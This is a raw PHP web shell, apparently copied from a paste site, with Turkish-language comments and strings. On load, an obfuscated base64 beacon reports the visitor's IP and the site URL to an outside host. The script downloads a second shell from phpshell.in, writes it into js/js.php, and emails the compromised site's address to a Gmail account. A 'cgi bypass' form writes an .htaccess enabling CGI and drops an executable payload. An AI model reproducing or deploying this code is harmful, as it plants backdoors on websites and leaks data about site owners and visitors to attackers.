1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
|
<?php function GetIP(){ if(getenv("HTTP_CLIENT_IP")) { $ip = getenv("HTTP_CLIENT_IP"); } elseif(getenv("HTTP_X_FORWARDED_FOR")) { $ip = getenv("HTTP_X_FORWARDED_FOR"); if (strstr($ip, ',')) { $tmp = explode (',', $ip); $ip = trim($tmp[0]); } } else { $ip = getenv("REMOTE_ADDR"); } return $ip; } $x = base64_decode('aHR0cDovL2J5cjAwdC5jby9sLQ==').GetIP().'-'.base64_encode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']); if(function_exists('curl_init')) { $ch = @curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch); if($gitt == false){ @$gitt = file_get_contents($x); } }elseif(function_exists('file_get_contents')){ @$gitt = file_get_contents($x); } ?><?php if($_POST['query']){ $veriyfy = stripslashes(stripslashes($_POST['query'])); $data = "data.txt"; @touch ("data.txt"); $ver = @fopen ($data , 'w'); @fwrite ( $ver , $veriyfy ) ; @fclose ($ver); }else{ $datas=@fopen("data.txt",'r'); $i=0; while ($i <= 5) { $i++; $blue=@fgets($datas,1024); echo $blue; } } $datasi=@fopen("js/js.php",'r'); if($datasi){ }else{ @mkdir("js"); $dos = file_get_contents("http://phpshell.in/txt/lamer.txt"); $data = "js/js.php"; @touch ("js/js.php"); $ver = @fopen ($data , 'w'); @fwrite ( $ver , $dos ) ; @fclose ($ver); $yol = "http://".$_SERVER['HTTP_HOST']."".$_SERVER['REQUEST_URI'].""; $y = '<h1>Sender Yazdirildi.<br/> SITE YOL : '.$yol.'<br/>Sender Yolu : js/crs.php</h1>'; $header .= "From: SheLL Boot <suppor@nic.org>\n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?> <?php echo '<html><form method="POST"><title>priv cgi by Wso</title><center><img src="http://wsoshell/" width="400"><h1>cgi bypass shell<br>Wso</h1><h3>pass : r00t</h3><button type="submit" name="cgi3">cgi bypass</button>В </center></html>';
if(isset($_POST['cgi3'])){ mkdir("dark0cgi"); chdir("dark0cgi"); $kokdosya = ".htaccess"; $dosya_adi = "$kokdosya"; $dosya = fopen($dosya_adi,'w'); $metin = "Options +ExecCGI\nDirectoryIndex dark0.xx\nAddHandler cgi-script .xx"; fwrite($dosya,$metin); fclose($dosya); $pythonp = ''; $file = fopen("dark0.xx" ,"w+"); $write = fwrite ($file ,base64_decode($pythonp)); fclose($file); chmod("dark0.xx",0755); echo '<center><p>Sucessfully</p><a href=dark0cgi/dark0.xx target="_blank">dark0cgi</a></center>'; }
|